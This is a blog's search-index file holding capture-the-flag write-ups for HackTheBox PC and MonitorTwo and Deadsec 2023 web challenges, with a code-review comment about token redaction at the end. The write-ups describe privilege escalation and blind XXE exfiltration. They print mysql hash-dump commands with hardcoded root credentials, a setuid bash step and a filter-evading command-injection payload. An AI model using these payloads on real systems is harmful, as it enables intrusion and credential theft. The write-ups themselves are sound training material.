The we read user.txt\n I uploaded linpeas.sh to the target and ran it , I found out that there was a webserver listening on port 127.0.0.1:8000. To access it on our machine we can use a technique known as ssh port forwarding.\n1 2 3 4 5 6 Here is the command ssh -L 8000:localhost:8000 sau@10.10.11.214 It will map port 8000 on the server to port 8000 locally Visiting the url we find out it is a login page of pyload. Since we dont have login creds , I searched for exploits aganist pyload and luckily there is an unathenticated rce.\nI used this exploit to understand more on how i works , here.\nRunning the exploit we get are root :() and we can read root.txt.\n REFERENCES for gprc and other ways to expoit it:\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-1-c0059362c4b5\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-2-b1fd38f8cd88\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-3-c92f3b687dd9\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-4-f1c260bbb00a\n","date":"2023-06-09T17:22:15+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb-pc/","title":"HTB PC"},{"content":"HTB monitortwo writeup categoty : web\ndifficulty : easy\nAs always we begin with a port scan\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 Starting Nmap 7.80 ( https://nmap.org ) at 2023-06-02 12:45 EAT Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 56.80% done; ETC: 12:46 (0:00:15 remaining) Nmap scan report for 10.10.11.211 Host is up (0.28s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Login to Cacti Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. 
Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 53.63 seconds As you can see there is a web interface , it is a login page and it utilizes something called cacti version 1.2.22\nUsing searchsploit :\nrunning the exploit, BOOM!! we get a reverse shell\n Looking around there is nothing really interesting , i ran linpeas and all i could find was a suid binary called capsh , you can check out how to exploit it here\nbut there was nothing in the root folder , turns out we were in a docker container that ran the webserver.The file that caught my attention was entrypoint.sh in the root folder.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 #!/bin/bash set -ex wait-for-it db:3306 -t 300 -- echo \u0026#34;database is connected\u0026#34; if [[ ! $(mysql --host=db --user=root --password=root cacti -e \u0026#34;show tables\u0026#34;) =~ \u0026#34;automation_devices\u0026#34; ]]; then mysql --host=db --user=root --password=root cacti \u0026lt; /var/www/html/cacti.sql mysql --host=db --user=root --password=root cacti -e \u0026#34;UPDATE user_auth SET must_change_password=\u0026#39;\u0026#39; WHERE username = \u0026#39;admin\u0026#39;\u0026#34; mysql --host=db --user=root --password=root cacti -e \u0026#34;SET GLOBAL time_zone = \u0026#39;UTC\u0026#39;\u0026#34; fi chown www-data:www-data -R /var/www/html # first arg is `-f` or `--some-option` if [ \u0026#34;${1#-}\u0026#34; != \u0026#34;$1\u0026#34; ]; then set -- apache2-foreground \u0026#34;$@\u0026#34; fi exec \u0026#34;$@\u0026#34; As you can see , we can use that format to run mysql statements.I used the following to dump users in the user_auth table.\n1 2 mysql --host=db --user=root --password=root cacti -e \u0026#34;SELECT * FROM user_auth\u0026#34; We get that there are 3 user accounts, admin, guest and marcus and their password hashes.I saved the hashes to a file and let john-the-ripper do its thing.\nI tried logging in the webpage but i got access 
denied and then tried ssh login as marcus, BOOM!! i am now marcus.\nWe can read the user.txt in the home folder\nI tried running linpeas again but still got nothing , also checked suid binaries but still nothing , at this point i did not know what to do.\nI got a hint that there was a docker vulnerability that resulted in privilledge escalation , you can read more and get the exploit here CVE-2021-41091\nFor this exploit to work you will utilize the capsh privesc we had discovered earlier in the reverse shell to set the \u0026ldquo;chmod u+s bash\u0026rdquo; .\nthen we execute the bash binary above as the in the marcus ssh session, BOOM!! root baby!!\nGoodbye ;)\n","date":"2023-06-02T16:31:02+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb-monitortwo/","title":"HTB Monitortwo"},{"content":"check it out on my github \u0026raquo; here\n","date":"2023-05-31T13:03:23+03:00","permalink":"https://f0rk3b0mb.github.io/p/bic-winter-con-2023/","title":"Bic winter con 2023"},{"content":"check it out on my github \u0026raquo; here\n","date":"2023-05-31T12:59:47+03:00","image":"https://f0rk3b0mb.github.io/cover/ca-logo-2023.webp","permalink":"https://f0rk3b0mb.github.io/p/htb-cyberapocalypse-2023/","title":"htb cyberapocalypse 2023"},{"content":"xee1 category: web\nsolution From the title you can tell this is a classic xxe challenge , when you capture the login request in burp repeater you will realize that the username is echoed out , so we have to make sure the output of our xxe payload is reflected in the page through the user name field.\nI crafted a payload to read /flag.txt , we also need to pass it through a php filter , we get the flag in base64 format\nxee2 category: web\nsolution This challenge is a subsequent of xxe2 but required a more complex approach, this time we have to receive the flag remotely since our user input is not being reflaected in the site , this is known as blind xxe . 
You can read more about it here\nso after some research i created thhis payload that reads the /flag.txt and sends it to a ngrok endpoint, ps we also have to pass read the flag through a php filter\nI get a hit and we can decode the flag from base64 as shown below\nBing category: web\nsolution This was a little complicated , i saw it as more of a bash jail than a web challenge.\nBasically you wegiven a simple site with page that would serve the flag, there was clearly command injection , cince you could run the i command. There was also a poor attempt at a regex filter at the frontend so this challnge could only be solved using burp.\nfile reading commands like cat were blocked also spaces , so you had to try any command you knew to read a file. Heres the solution:\n\u0026lsquo;head$IFS/fl??.txt|rev\u0026rsquo;\nwithout the rev the page will not display there may be a flag filter , so we reverse it\n","date":"2023-05-21T12:44:03+03:00","image":"https://f0rk3b0mb.github.io/cover/deadsec.jpeg","permalink":"https://f0rk3b0mb.github.io/p/deadsec-2023/","title":"Deadsec 2023"}] \ No newline at end of file
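Review bot: the removed search-index line embeds each post body verbatim, and the HTB PC request dump inside it carries a grpcui CSRF token (`x-grpcui-csrf-token` / `_grpcui_csrf_token`) and a bearer JWT in the `metadata` field; since the index is regenerated from the post sources, those values will reappear in the replacement line unless they are redacted in the originating post (for example replacing the token and JWT with `<redacted>` placeholders) before the site is rebuilt. A second, minor point: because the whole index is one minified JSON line, the hunk shows the entire old content as a single `-` line, so the actual delta (the Networking section update) cannot be reviewed here; if the generated `search/index.json` must be committed, pretty-printed output or a note in the commit message stating that only the knightctf entry changed would make this hunk reviewable.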